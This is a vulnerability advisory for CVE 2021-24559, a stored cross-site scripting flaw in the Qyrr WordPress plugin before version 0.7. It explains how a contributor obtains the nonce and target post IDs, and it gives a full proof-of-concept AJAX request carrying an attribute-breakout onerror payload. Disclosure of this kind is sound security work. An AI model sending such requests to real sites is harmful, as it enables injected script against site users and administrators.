Qyrr < 0.7 – Authenticated (contributor+) Stored XSS | CVE 2021-24559

Description

The plugin does not escape the data-uri of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the data_uri_to_meta AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role as low as Contributor allowing any user with such role (and above) to set a malicious data-uri in arbitrary QR Code posts, leading to a Stored Cross-Site Scripting issue.

Proof of Concept

To exploit this vulnerability the attacker should have access, at least, to an account with the capability 'edit_posts'. ( Eg. contributor ). This is required to obtain a nonce, which is used to protect the affected ajax function. 

To obtain the nonce, the attacker calls: "<your host here>/wp-admin/edit.php?post_type=qr". The nonce now lays in a script with the id "qyrr-admin-js-extra".

Inside the script, the exploitable qr-posts are listed (post_id is the id of post meta data with the meta key 'data-uri' ). There is no check, if the requesting user is the owner of that qr post.

The third required parameter is data-uri. This param will contain the stored javascript. On request-processing data-uri will be sanitized by sanitize_text_field but will not be escaped when output in the src attribute of the QR Code Image 


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Connection: close
Cookie: [contributor+]

action=data_uri_to_meta&nonce=d5c0a0e3fa&post_id=1238&data-uri=+%22+onerror%3Dalert(1)+e%3D%22


Then access the page/post where the QR Code is embed to trigger the XSS